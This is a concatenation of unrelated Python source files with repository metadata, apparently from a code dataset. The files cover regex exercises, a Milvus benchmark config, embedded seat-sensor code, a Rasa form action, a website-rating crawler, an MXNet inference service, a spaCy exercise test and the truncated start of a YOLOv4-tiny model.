#daten = "ython python -*0201/637434* -467.1345"
#muster = "^[Pp]ython"
# Aufgabe 2
#daten = " # Kommentarzeile mit vielen Wörtern und so...besser wäre einlesen einer Datei, zeilenweise"
#muster = "^([#]|[ #]).*"
# Aufgabe 3
#daten = "Python python -*0201/637434* -467.1345"
#muster = "[0-9]|[-]|[+]"
'''
4. Ein Zeichen das kein Buchstabe ist
5. eine IP Adresse
6. Eine Textzeile mit genau drei Zeichen
'''
# Aufgabe 4
#daten = "ython python -*0201/637434* -467.1345"
#muster = "[^A-Za-z]"
# Aufgabe 5
#daten = "ython python 127.0.0.1 0.0.0.0 192.168.0.1 10.10.10.1 -*0201/637434* -467.1345"
#muster = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
# Aufgabe 6 '" + gefunden +"'"
#daten = "yth"
#muster = "^.{3}$"
'''
7. Ein Datum (12.12.12, 1.1.20 oder 12.12.2012)
8. Eine gültige E-Mail Adresse
9. Eine negative Zahl mit 4 Nachkommastellen
10. Eine Festnetznummer mit je einem Stern davor und danch *1231/121231*
'''
# Aufgabe 7
#daten = "ython 01.01.2020 python -*0201 20.2.123 /637434* 14.10.1999 -467.1345asdh ahsdl 1.2.09"
#muster = "\d{1,2}\.\d{1,2}\.\d{2,4}" # doof: auch Jahrezahlen mit 3 Stellen werden gefunden
# Aufgabe 8
#daten = "ython 01.01.2020 [email protected] [email protected] [email protected] pytho [email protected] -*0201 [email protected] 20.2.123 /637434* 14.10.1999 -467.1345asdh ahsdl 1.2.09"
#muster = "[\.\_\-\w]+\@[\w]+\.[\w]+"
# Aufgabe 9
#daten = "ython 01.01.2020 -123,1234 123.1234 321,4321 -431,5431123 -1.1234567 python -*0201 20.2.123 /637434* 14.10.1999 -467.1345asdh ahsdl 1.2.09"
#muster = "\s(-\d+[,\.]\d{4})"
# Aufgabe 10
#daten = "ython python -*0201/637434* -467.1345"
#muster = "\*\d+/\d+\*"
ergebnis = re.findall(muster,daten)
if ergebnis:
print("Gefunden: ")
for fundstelle in ergebnis:
print(" -> '" + fundstelle +"'")
else:
print("Nicht gefunden!")
| 27.116883 | 173 | 0.632184 |
ffd3ad210a0d6e0f8813ddf8affffbe59b0cc912
| 1,698 |
py
|
Python
|
benchmark_test/scripts/config.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2021-04-06T06:13:20.000Z
|
2021-04-06T06:13:20.000Z
|
benchmark_test/scripts/config.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
benchmark_test/scripts/config.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
from milvus import Milvus,DataType
import os
MILVUS_HOST = "192.168.1.58"
MILVUS_PORT = 19573
# create table param
seg = 1024
METRIC_TYPE = "L2"
# index IVF param
NLIST = 4096
PQ_M = 12
#index NSG param
SEARCH_LENGTH = 45
OUT_DEGREE = 50
CANDIDATE_POOL = 300
KNNG = 100
#index HNSW param
HNSW_M = 16
EFCONSTRUCTION = 500
# NL_FOLDER_NAME = '/data/lcl/200_ann_test/source_data'
# insert param
FILE_TYPE = 'npy'
FILE_NPY_PATH = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/milvus_sift1m'
FILE_CSV_PATH = '/data1/lym/dataset_test/csv_dataset'
FILE_FVECS_PATH = '/mnt/data/base.fvecs'
FILE_BVECS_PATH = '/data/workspace/lym/milvus_test/data/sift_data/bigann_base.bvecs'
# VECS_VEC_NUM = 1000000000
VECS_VEC_NUM = 20000
VECS_BASE_LEN = 20000
if_normaliz = False
# performance param
NQ_FOLDER_NAME = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/query_data'
PERFORMANCE_FILE_NAME = 'performance'
nq_scope = [1,10,100,500]
#nq_scope = [1000, 1000]
topk_scope = [1, 10,100,500]
#nq_scope = [1, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750, 800]
#topk_scope = [1,1, 20, 50, 100, 300, 500, 800, 1000]
IS_CSV = False
IS_UINT8 = False
#recall param
recall_topk = 500
compute_recall_topk = [1, 10, 100,500]
recall_nq = 500
recall_vec_fname = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/query_data/query.npy'
#recall_vec_fname = '/data/workspace/lym/milvus_08_bootcamp/bootcamp/benchmark_test/scripts/data/sift1m/data/binary_128d_00000.npy'
GT_FNAME_NAME = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/gnd/ground_truth_1M.txt'
recall_res_fname = 'recall_result'
recall_out_fname = 'recall_result/recall_compare_out'
| 23.583333 | 131 | 0.767373 |
8aafdb41cfcb3d905748244f6e4a6c9107578fba
| 12,246 |
py
|
Python
|
MAIN/STM32F405/V13/register.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405/V13/register.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405/V13/register.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
import os
import peripheral
import time
OPEN_SCENE_SHOW_TIME = 2500
CLOSING_TIME = 10000
CLOSE_SCENE_SHOW_TIME = 1000
MAX_SEAT_NUMBER = 33
InComingDataSize = 10
class Proximity:
class Default:
Threshold = 100
PositiveTolerance = 10
NegativeTolerance = 25
constVal = 1
divider = 10
multiple = 1
thresholdDivider = 2
class Sensor():
FullData = bytearray(InComingDataSize)
def __init__(self, ID=bytearray(3), IsSensorHasID=False, Prox1Active=False, Prox1Config=bytearray(5), Prox2Active=False, Prox2Config=bytearray(5)):
super().__init__()
self.ID = ID
self.IsSensorHasID = IsSensorHasID
self.Prox1_ConfigAddressInArray = 3
self.Prox1_ResolationAddressInArray = 5
self.Prox1_Threshold = Proximity.Default.Threshold
self.Prox1_PositiveTolerance = Proximity.Default.PositiveTolerance
self.Prox1_NegativeTolerance = Proximity.Default.NegativeTolerance
self.Prox1_CurrentResolation = 0
self.Prox1_IsSeatActive = False
self.Prox1_IsSeatHasPassanger = False
self.Prox1_IsSeatHasBelt = False
self.Prox2_ConfigAddressInArray = 4
self.Prox2_ResolationAddressInArray = 6
self.Prox2_Threshold = Proximity.Default.Threshold
self.Prox2_PositiveTolerance = Proximity.Default.PositiveTolerance
self.Prox2_NegativeTolerance = Proximity.Default.NegativeTolerance
self.Prox2_CurrentResolation = 0
self.Prox2_IsSeatActive = False
self.Prox2_IsSeatHasPassanger = False
self.Prox2_IsSeatHasBelt = False
BatteryMeasurement = 0
BatteryMeasurementPercent = 0
if Prox1Active == True:
self.Prox1_ConfigAddressInArray = Prox1Config[0]
self.Prox1_ResolationAddressInArray = Prox1Config[1]
self.Prox1_Threshold = Prox1Config[2]
self.Prox1_PositiveTolerance = Prox1Config[3]
self.Prox1_NegativeTolerance = Prox1Config[4]
self.Prox1_IsSeatActive = True
if Prox2Active == True:
self.Prox2_ConfigAddressInArray = Prox2Config[0]
self.Prox2_ResolationAddressInArray = Prox2Config[1]
self.Prox2_Threshold = Prox2Config[2]
self.Prox2_PositiveTolerance = Prox2Config[3]
self.Prox2_NegativeTolerance = Prox2Config[4]
self.Prox2_IsSeatActive = True
def DataIn(self, data=bytearray(InComingDataSize)):
if data[:3] != self.ID:
return False
ref1Res = data[self.Prox1_ResolationAddressInArray + 1] | (data[self.Prox1_ResolationAddressInArray] << 8)
ref2Res = data[self.Prox2_ResolationAddressInArray + 1] | (data[self.Prox2_ResolationAddressInArray] << 8)
Prox1ResolationCurrentValue = 0 if ref1Res > 8191 else ref1Res
Prox2ResolationCurrentValue = 0 if ref2Res > 8191 else ref2Res
self.BatteryMeasurement = (data[3] & 0xF0 | (data[4] & 0xF0) >> 4) + 9
self.BatteryMeasurementPercent = round(((self.BatteryMeasurement * 2.5 / 255 * 2) - 2.0) / 1.2 * 10) * 10
self.BatteryMeasurementPercent = 100 if self.BatteryMeasurementPercent > 100 else self.BatteryMeasurementPercent
self.BatteryMeasurementPercent = 0 if self.BatteryMeasurementPercent < 0 else self.BatteryMeasurementPercent
self.Calibration(Prox1ResolationCurrentValue, Prox2ResolationCurrentValue)
if self.Prox1_IsSeatActive == True:
self.Prox1_CurrentResolation = Prox1ResolationCurrentValue
if self.Prox1_CurrentResolation > (self.Prox1_Threshold + self.Prox1_PositiveTolerance):
self.Prox1_IsSeatHasPassanger = True
elif self.Prox1_CurrentResolation < (self.Prox1_Threshold - self.Prox1_NegativeTolerance):
self.Prox1_IsSeatHasPassanger = False
self.Prox1_IsSeatHasBelt = True if ((data[self.Prox1_ConfigAddressInArray] >> 1) & 0x01) == 1 else False
#self.Prox1_IsSeatActive = True if (data[self.Prox1_ConfigAddressInArray] & 0x01) == 1 else False
if self.Prox2_IsSeatActive == True:
self.Prox2_CurrentResolation = Prox2ResolationCurrentValue
if self.Prox2_CurrentResolation > (self.Prox2_Threshold + self.Prox2_PositiveTolerance):
self.Prox2_IsSeatHasPassanger = True
elif self.Prox2_CurrentResolation < (self.Prox2_Threshold - self.Prox2_NegativeTolerance):
self.Prox2_IsSeatHasPassanger = False
self.Prox2_IsSeatHasBelt = True if ((data[self.Prox2_ConfigAddressInArray] >> 1) & 0x01) == 1 else False
#self.Prox2_IsSeatActive = True if (data[self.Prox2_ConfigAddressInArray] & 0x01) == 1 else False
#print("\rSensor ID: {}".format(self.ID))
#print("Battery Level: %{}".format(self.BatteryMeasurementPercent))
#print("Proximity _1_ Status:\n\rResolation: {}\n\rSensor Active: {}\n\rSeatbelt Pluged: {}".format(self.Prox1_CurrentResolation, self.Prox1_IsSeatActive, self.Prox1_IsSeatHasBelt))
#print("Proximity _2_ Status:\n\rResolation: {}\n\rSensor Active: {}\n\rSeatbelt Pluged: {}".format(self.Prox2_CurrentResolation, self.Prox2_IsSeatActive, self.Prox2_IsSeatHasBelt))
return True
def Calibration(self, p1Res=0, p2Res=0):
if p1Res > p2Res and p1Res > Proximity.Default.Threshold:
self.Prox1_Threshold = p1Res * 0.6
self.Prox2_Threshold = self.Prox1_Threshold
print("th: {}, res: {}".format(self.Prox1_Threshold, p1Res))
elif p2Res > p1Res and p2Res > Proximity.Default.Threshold:
self.Prox2_Threshold = p2Res * 0.6
self.Prox1_Threshold = self.Prox2_Threshold
print("th: {}, res: {}".format(self.Prox1_Threshold, p1Res))
elif p1Res == 0 and p2Res == 0:
self.Prox1_Threshold = Proximity.Default.Threshold
self.Prox2_Threshold = Proximity.Default.Threshold
#print("p1Threshold:{}, p2Threshold:{}, defaultThreshold:{}".format(self.Prox1_Threshold + self.Prox1_PositiveTolerance, self.Prox2_Threshold + self.Prox2_PositiveTolerance, Proximity.Default.Threshold))
class DataBase():
def __init__(self):
super().__init__()
self.SensorList = []
self.dbRaw = ""
self.rawList = ""
self.file = ""
self.IsDbFileExist = False
self.Setup()
def Setup(self):
self.CreateDbFile("SensorDB.db")
if self.IsDbFileExist == True:
self.ImportRawDataFromDB()
self.UnzipRawData()
def CreateDbFile(self, name="SensorDB.db"):
try:
self.file = open(name, "r")
self.IsDbFileExist = True
except OSError:
pass
def FlushRawDataToDB(self):
if self.dbRaw == "":
return
with open("SensorDB.db", "w") as self.file:
self.file.write(self.dbRaw)
time.sleep(.01)
self.file.flush()
time.sleep(.01)
self.file.close()
time.sleep(.01)
def ImportRawDataFromDB(self):
with open("SensorDB.db", "r") as self.file:
self.dbRaw = self.file.read()
time.sleep(.01)
self.file.close()
def UnzipRawData(self):
if self.dbRaw == "":
return
self.rawList = self.dbRaw.splitlines()
self.dbRaw = ""
self.SensorList.clear()
tList = []
for item in self.rawList:
temporaryData = item.split('*')
for d in temporaryData[0].split(','):
if d != "":
tList.append(int(d))
D1 = bytearray(tList)
tList.clear()
if temporaryData[1] == "True":
D2 = True
else:
D2 = False
if temporaryData[2] == "True":
D3 = True
else:
D3 = False
for d in temporaryData[3].split(','):
if d != "":
tList.append(int(d))
D4 = bytearray(tList)
tList.clear()
if temporaryData[4] == "True":
D5 = True
else:
D5 = False
for d in temporaryData[5].split(','):
if d != "":
tList.append(int(d))
D6 = bytearray(tList)
tList.clear()
self.CreateSensorObject(D1, D2, D3, D4, D5, D6)
def Process(self, fullData=[]):
for data in fullData:
if self.SensorList and self.CheckCRC(data) == True:
for item in self.SensorList:
if item.DataIn(data) == True:
continue
def DefineSensorObject(self, fullData=[]):
self.SensorList
checkFlag = True
for data in fullData:
if self.CheckCRC(data) == True:
if self.SensorList:
for item in self.SensorList:
if item.ID == data[:3]:
checkFlag = False
break
if checkFlag is True:
print(fullData)
if (((data[3] >> 0) & 0x01) == 1) and (data[6] | (data[5] << 8)) > (data[8] | (data[7] << 8)):
if ((data[4] >> 0) & 0x01) == 1:
self.CreateSensorObject(data[:3], True, True, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], True, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
else:
self.CreateSensorObject(data[:3], True, True, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], False, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
elif (((data[4] >> 0) & 0x01) == 1) and (data[8] | (data[7] << 8)) > (data[6] | (data[5] << 8)):
if ((data[3] >> 0) & 0x01) == 1:
self.CreateSensorObject(data[:3], True, True, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], True, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
else:
self.CreateSensorObject(data[:3], True, True, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], False, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
def CreateSensorObject(self, ID=bytearray(3), IsSensorHasID=False, Prox1Active=False, Prox1Config=bytearray(5), Prox2Active=False, Prox2Config=bytearray(5)):
self.SensorList.append(Sensor(ID, IsSensorHasID, Prox1Active, Prox1Config, Prox2Active, Prox2Config))
for b in ID:
self.dbRaw += str(b) + ","
self.dbRaw += "*"
self.dbRaw += str(IsSensorHasID)
self.dbRaw += "*"
self.dbRaw += str(Prox1Active)
self.dbRaw += "*"
for b in Prox1Config:
self.dbRaw += str(b) + ","
self.dbRaw += "*"
self.dbRaw += str(Prox2Active)
self.dbRaw += "*"
for b in Prox2Config:
self.dbRaw += str(b) + ","
self.dbRaw += "\n"
replay = 1
if Prox1Active == True and Prox2Active == True:
replay = 2
peripheral.buzzerObject(replay=replay, onTime=25)
print(self.dbRaw)
def CheckCRC(self, data=bytearray(InComingDataSize)):
crc = 0xDB
for i in range(len(data) - 1):
crc ^= data[i]
print("\n\rCRC:{}, C:{}, Status: {}".format(crc, data[len(data) - 1], bool(crc == data[len(data) - 1])))
return bool(crc == data[len(data) - 1])
def ClearAllData(self):
self.SensorList.clear()
self.dbRaw = ""
try:
os.remove("SensorDB.db")
except OSError:
pass
| 43.119718 | 302 | 0.608035 |
8ab8310083b8af1b3349e8e88818e5aed663f3d0
| 4,459 |
py
|
Python
|
examples/formbot/actions/actions.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 1 |
2020-10-14T18:09:10.000Z
|
2020-10-14T18:09:10.000Z
|
examples/formbot/actions/actions.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 209 |
2020-03-18T18:28:12.000Z
|
2022-03-01T13:42:29.000Z
|
examples/formbot/actions/actions.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Text, Any, List, Union
from rasa_sdk import Tracker
from rasa_sdk.executor import CollectingDispatcher
from rasa_sdk.forms import FormAction
class RestaurantForm(FormAction):
"""Example of a custom form action."""
def name(self) -> Text:
"""Unique identifier of the form."""
return "restaurant_form"
@staticmethod
def required_slots(tracker: Tracker) -> List[Text]:
"""A list of required slots that the form has to fill."""
return ["cuisine", "num_people", "outdoor_seating", "preferences", "feedback"]
def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:
"""A dictionary to map required slots to
- an extracted entity
- intent: value pairs
- a whole message
or a list of them, where a first match will be picked."""
return {
"cuisine": self.from_entity(entity="cuisine", not_intent="chitchat"),
"num_people": [
self.from_entity(
entity="number", intent=["inform", "request_restaurant"]
),
],
"outdoor_seating": [
self.from_entity(entity="seating"),
self.from_intent(intent="affirm", value=True),
self.from_intent(intent="deny", value=False),
],
"preferences": [
self.from_intent(intent="deny", value="no additional preferences"),
self.from_text(not_intent="affirm"),
],
"feedback": [self.from_entity(entity="feedback"), self.from_text()],
}
@staticmethod
def cuisine_db() -> List[Text]:
"""Database of supported cuisines."""
return [
"caribbean",
"chinese",
"french",
"greek",
"indian",
"italian",
"mexican",
]
@staticmethod
def is_int(string: Text) -> bool:
"""Check if a string is an integer."""
try:
int(string)
return True
except ValueError:
return False
def validate_cuisine(
self,
value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
"""Validate cuisine value."""
if value.lower() in self.cuisine_db():
# validation succeeded, set the value of the "cuisine" slot to value
return {"cuisine": value}
else:
dispatcher.utter_message(template="utter_wrong_cuisine")
# validation failed, set this slot to None, meaning the
# user will be asked for the slot again
return {"cuisine": None}
def validate_num_people(
self,
value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
"""Validate num_people value."""
if self.is_int(value) and int(value) > 0:
return {"num_people": value}
else:
dispatcher.utter_message(template="utter_wrong_num_people")
# validation failed, set slot to None
return {"num_people": None}
def validate_outdoor_seating(
self,
value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
"""Validate outdoor_seating value."""
if isinstance(value, str):
if "out" in value:
# convert "out..." to True
return {"outdoor_seating": True}
elif "in" in value:
# convert "in..." to False
return {"outdoor_seating": False}
else:
dispatcher.utter_message(template="utter_wrong_outdoor_seating")
# validation failed, set slot to None
return {"outdoor_seating": None}
else:
# affirm/deny was picked up as True/False by the from_intent mapping
return {"outdoor_seating": value}
def submit(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> List[Dict]:
"""Define what the form has to do after all required slots are filled."""
dispatcher.utter_message(template="utter_submit")
return []
| 31.624113 | 86 | 0.555954 |
8ad110e2b7bfc382f38046b0b8aa2b57b45e41bb
| 3,255 |
py
|
Python
|
spider/spider.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | null | null | null |
spider/spider.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | null | null | null |
spider/spider.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | null | null | null |
"""
Provides the spider functionality (website checks).
"""
import argparse
import json
import logging
import re
import statistics
import time
from datetime import datetime
from pprint import pprint
from google.api_core.exceptions import InvalidArgument
from google.cloud import datastore
import checks
import config
import jobs
import rating
def check_and_rate_site(entry):
"""
Performs our site checks, calculates the score
and returns results as a dict.
"""
# all the info we'll return for the site
result = {
# input_url: The URL we derived all checks from
'input_url': entry['url'],
# Meta: Regional and type metadata for the site
'meta': {
'type': entry.get('type'),
'level': entry.get('level'),
'state': entry.get('state'),
'district': entry.get('district'),
'city': entry.get('city'),
},
# checks: Results from our checks
'checks': {},
# The actual report scoring criteria
'rating': {},
# resulting score
'score': 0.0,
}
# Results from our next generation checkers
result['checks'] = checks.perform_checks(entry['url'])
result['rating'] = rating.calculate_rating(result['checks'])
# Overall score is the sum of the individual scores
for key in result['rating']:
result['score'] += result['rating'][key]['score']
# remove full HTML page content and hyperlinks to safe some storage
try:
for url in result['checks']['page_content']:
del result['checks']['page_content'][url]['content']
del result['checks']['hyperlinks']
except:
pass
return result
def test_url(url):
"""
Run the spider for a single URL and print the result.
Doesn't write anything to the database.
"""
logging.info("Crawling URL %s", url)
# mock job
job = {
"url": url,
}
result = check_and_rate_site(entry=job)
pprint(result['rating'])
def work_of_queue(datastore_client, entity_kind):
"""
Take job from queue and finish it until there are no more jobs
"""
while True:
job = jobs.get_job_from_queue(datastore_client)
if job is None:
logging.info("No more jobs. Exiting.")
break
logging.info("Starting job %s", job["url"])
result = check_and_rate_site(entry=job)
logging.debug("Full JSON representation of returned result: %s", json.dumps(result, default=str))
logging.info("Job %s finished checks", job["url"])
logging.info("Job %s writing to DB", job["url"])
key = datastore_client.key(entity_kind, job["url"])
entity = datastore.Entity(key=key)
record = {
'created': datetime.utcnow(),
'meta': result['meta'],
'checks': result['checks'],
'rating': result['rating'],
'score': result['score'],
}
entity.update(record)
try:
datastore_client.put(entity)
except InvalidArgument as ex:
logging.error("Could not write result: %s", ex)
except Exception as ex:
logging.error("Could not write result: %s", ex)
| 27.584746 | 105 | 0.604301 |
0a19083dfe5a7bbe31b5ca56b93085bcdd1ec4da
| 5,598 |
py
|
Python
|
official_examples/Using_MXNet_to_Create_a_MNIST_Dataset_Recognition_Application/codes/customize_service.py
|
hellfire0831/ModelArts-Lab
|
3e826a5b388244c0588b7bb916184750997ab272
|
[
"Apache-2.0"
] | 1,045 |
2019-05-09T02:50:43.000Z
|
2022-03-31T06:22:11.000Z
|
official_examples/Using_MXNet_to_Create_a_MNIST_Dataset_Recognition_Application/codes/customize_service.py
|
hellfire0831/ModelArts-Lab
|
3e826a5b388244c0588b7bb916184750997ab272
|
[
"Apache-2.0"
] | 1,468 |
2019-05-16T00:48:18.000Z
|
2022-03-08T04:12:44.000Z
|
official_examples/Using_MXNet_to_Create_a_MNIST_Dataset_Recognition_Application/codes/customize_service.py
|
hellfire0831/ModelArts-Lab
|
3e826a5b388244c0588b7bb916184750997ab272
|
[
"Apache-2.0"
] | 1,077 |
2019-05-09T02:50:53.000Z
|
2022-03-27T11:05:32.000Z
|
import mxnet as mx
import requests
import zipfile
import json
import shutil
import os
import numpy as np
from mxnet.io import DataBatch
from mms.log import get_logger
from mms.model_service.mxnet_model_service import MXNetBaseService
from mms.utils.mxnet import image, ndarray
logger = get_logger()
def check_input_shape(inputs, signature):
'''Check input data shape consistency with signature.
Parameters
----------
inputs : List of NDArray
Input data in NDArray format.
signature : dict
Dictionary containing model signature.
'''
assert isinstance(inputs, list), 'Input data must be a list.'
assert len(inputs) == len(signature['inputs']), 'Input number mismatches with ' \
'signature. %d expected but got %d.' \
% (len(signature['inputs']), len(inputs))
for input, sig_input in zip(inputs, signature['inputs']):
assert isinstance(input, mx.nd.NDArray), 'Each input must be NDArray.'
assert len(input.shape) == \
len(sig_input['data_shape']), 'Shape dimension of input %s mismatches with ' \
'signature. %d expected but got %d.' \
% (sig_input['data_name'], len(sig_input['data_shape']),
len(input.shape))
for idx in range(len(input.shape)):
if idx != 0 and sig_input['data_shape'][idx] != 0:
assert sig_input['data_shape'][idx] == \
input.shape[idx], 'Input %s has different shape with ' \
'signature. %s expected but got %s.' \
% (sig_input['data_name'], sig_input['data_shape'],
input.shape)
class DLSMXNetBaseService(MXNetBaseService):
'''MXNetBaseService defines the fundamental loading model and inference
operations when serving MXNet model. This is a base class and needs to be
inherited.
'''
def __init__(self, model_name, model_dir, manifest, gpu=None):
print ("-------------------- init classification servive -------------")
self.model_name = model_name
self.ctx = mx.gpu(int(gpu)) if gpu is not None else mx.cpu()
self._signature = manifest['Model']['Signature']
data_names = []
data_shapes = []
for input in self._signature['inputs']:
data_names.append(input['data_name'])
# Replace 0 entry in data shape with 1 for binding executor.
# Set batch size as 1
data_shape = input['data_shape']
data_shape[0] = 1
for idx in range(len(data_shape)):
if data_shape[idx] == 0:
data_shape[idx] = 1
data_shapes.append(('data', tuple(data_shape)))
# Load MXNet module
epoch = 0
try:
param_filename = manifest['Model']['Parameters']
epoch = int(param_filename[len(model_name) + 1: -len('.params')])
except Exception as e:
logger.warning('Failed to parse epoch from param file, setting epoch to 0')
sym, arg_params, aux_params = mx.model.load_checkpoint('%s/%s' % (model_dir, manifest['Model']['Symbol'][:-12]), epoch)
self.mx_model = mx.mod.Module(symbol=sym, context=self.ctx,
data_names=['data'], label_names=None)
self.mx_model.bind(for_training=False, data_shapes=data_shapes)
self.mx_model.set_params(arg_params, aux_params, allow_missing=True)
def _preprocess(self, data):
img_list = []
for idx, img in enumerate(data):
input_shape = self.signature['inputs'][idx]['data_shape']
# We are assuming input shape is NCHW
[h, w] = input_shape[2:]
if input_shape[1] == 1:
img_arr = image.read(img, 0)
else:
img_arr = image.read(img)
img_arr = image.resize(img_arr, w, h)
img_arr = image.transform_shape(img_arr)
img_list.append(img_arr)
return img_list
def _postprocess(self, data):
dim = len(data[0].shape)
if dim > 2:
data = mx.nd.array(np.squeeze(data.asnumpy(), axis=tuple(range(dim)[2:])))
sorted_prob = mx.nd.argsort(data[0], is_ascend=False)
top_prob = map(lambda x: int(x.asscalar()), sorted_prob[0:5])
return [{'probability': float(data[0, i].asscalar()), 'class': i}
for i in top_prob]
def _inference(self, data):
'''Internal inference methods for MXNet. Run forward computation and
return output.
Parameters
----------
data : list of NDArray
Preprocessed inputs in NDArray format.
Returns
-------
list of NDArray
Inference output.
'''
# Check input shape
check_input_shape(data, self.signature)
data = [item.as_in_context(self.ctx) for item in data]
self.mx_model.forward(DataBatch(data))
return self.mx_model.get_outputs()[0]
def ping(self):
'''Ping to get system's health.
Returns
-------
String
MXNet version to show system is healthy.
'''
return mx.__version__
@property
def signature(self):
'''Signiture for model service.
Returns
-------
Dict
Model service signiture.
'''
return self._signature
| 37.824324 | 127 | 0.566988 |
7ca1ea0ffc65c25b30e5f446ccbca20cf80ccd6a
| 553 |
py
|
Python
|
exercises/pt/test_03_10_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/pt/test_03_10_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/pt/test_03_10_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
assert Doc.has_extension("has_number"), "Você registrou a extensão no doc?"
ext = Doc.get_extension("has_number")
assert ext[2] is not None, "Você definiu o getter corretamente?"
assert (
"getter=get_has_number" in __solution__
), "Você atribuiu a função get_has_number como a função getter?"
assert "doc._.has_number" in __solution__, "Você está acessando o atributo personalizado?"
assert doc._.has_number, "Parece que a função getter está retornando o valor errado."
__msg__.good("Bom trabalho!")
| 46.083333 | 94 | 0.717902 |
6b31f06182219ab8ebe4752adf4b18d4b079f30e
| 13,283 |
py
|
Python
|
nets/yolo4_tiny.py
|
Rory-Godwin/FOLO
|
32b4773cec99edc6ce7baff9c113eba4f8dc1d29
|
[
"MIT"
] | null | null | null |
nets/yolo4_tiny.py
|
Rory-Godwin/FOLO
|
32b4773cec99edc6ce7baff9c113eba4f8dc1d29
|
[
"MIT"
] | null | null | null |
nets/yolo4_tiny.py
|
Rory-Godwin/FOLO
|
32b4773cec99edc6ce7baff9c113eba4f8dc1d29
|
[
"MIT"
] | null | null | null |
from functools import wraps
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import (Add, Concatenate, Conv2D, MaxPooling2D, UpSampling2D,
ZeroPadding2D)
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.regularizers import l2
from utils.utils import compose
from nets.CSPdarknet53_tiny import darknet_body
#--------------------------------------------------#
# 单次卷积DarknetConv2D
# 如果步长为2则自己设定padding方式。
# 测试中发现没有l2正则化效果更好,所以去掉了l2正则化
#--------------------------------------------------#
@wraps(Conv2D)
def DarknetConv2D(*args, **kwargs):
# darknet_conv_kwargs = {'kernel_regularizer': l2(5e-4)}
darknet_conv_kwargs = {}
darknet_conv_kwargs['padding'] = 'valid' if kwargs.get('strides')==(2,2) else 'same'
darknet_conv_kwargs.update(kwargs)
return Conv2D(*args, **darknet_conv_kwargs)
#---------------------------------------------------#
# 卷积块
# DarknetConv2D + BatchNormalization + LeakyReLU
#---------------------------------------------------#
def DarknetConv2D_BN_Leaky(*args, **kwargs):
no_bias_kwargs = {'use_bias': False}
no_bias_kwargs.update(kwargs)
return compose(
DarknetConv2D(*args, **no_bias_kwargs),
BatchNormalization(),
LeakyReLU(alpha=0.1))
#---------------------------------------------------#
# 特征层->最后的输出
#---------------------------------------------------#
#######################################################################################
####### RG FOLOv2 #######
####### 08/04/2021 #######
####### OUT 67 IN 62,66 #######
####### MOD 61,68,70,71 ADDED 77,78 #######
#######################################################################################
def yolo_body(inputs, num_anchors, num_classes):
#---------------------------------------------------#
# 生成CSPdarknet53_tiny的主干模型
# feat1的shape为26,26,256
